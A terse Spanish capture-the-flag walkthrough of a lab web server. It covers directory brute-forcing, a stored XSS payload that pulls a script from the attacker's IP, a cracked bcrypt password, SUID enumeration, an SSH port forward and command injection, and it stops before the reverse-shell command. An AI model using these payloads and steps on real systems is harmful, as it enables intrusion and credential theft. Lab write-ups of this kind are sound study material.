Analizamos la web y vamos a buscar directorios

gobuster dir --url http://10.10.11.28/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20

vamos a seguir buscando dentro de estos, y vemos que dentro de themes esta bike con estos archivos dentro de version vemos esta version: 3.2.0 y en LICENSE vemos el autor ahora vamos a buscar archivos por extensiones tal que asi:

gobuster dir --url http://10.10.11.28/themes/bike -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -b 403,404 -x md,php,js

en el readme.md vemos el programa si investigamos vemos que tiene unn exploit https://github.com/insomnia-jacob/CVE-2023-41425, la web deberia tener una pagina de login tal que asi: http://10.10.11.28/index.php?page=loginURL

vamos a ver como podemos hacer el xss analizando el codigo del exploit, vemos que lo que hace es mandar est payload, el cual descarga un script almacenado en nuestro server llamadom xss.js pero esa direccion debe almacenarse en algun lugar del server, es decir tenemos que meter este texto en algun formulario que se guarde en el server, y hay un sitio, el formulario de contact.php Nos ponemos en escucha sudo tcpdump -i tun0 icmp -n y mandamos esta cadena http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.222:8000/xss_ping_fetch.js"></script><form+action="

hay dos usuario insteresantes vamos a revisar el servidor a ver si hay algo interesante, y tenemos una passwod en database.js $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q Vamos a listar archivos SUID

 find / -perm -4000 2> /dev/null | xargs ls -l

vamos a buscar vulnerabilidades para esa version del binario pero si intentamos pasarlo nos pone que no hay espacio en el disco, vamos a ver si podemos cambiar algun archivo para que contenta nuestro exploit https://gist.githubusercontent.com/taviso/ecb70eb12d461dd85cba/raw/abd3a4cbedd0d9c16f406841586bccff67ee991a/CVE-2015-3202, vamos a ver mas cosas, com ver los puertos abiertos bueno vamos a descifrar la password (para ello tenemos que quitar \ del hash) pass: mychemicalromance ahora entramos con ssh a ver que hay con uno de los usurios de antes, en este caso amay, ahora hacemos un portfowarding del puerto 8080 y vemos esto:

vamos a iniciar session con los creadenciales de amay/mychemicalromance y tenemos esto vamos a verlo desde burpsuite vemos que estaa usando algo como cat para leer los archivos, vamos a intentar inyectar comandos como un ping y si podemos tambien vale asi podemos mandar una revershell asi: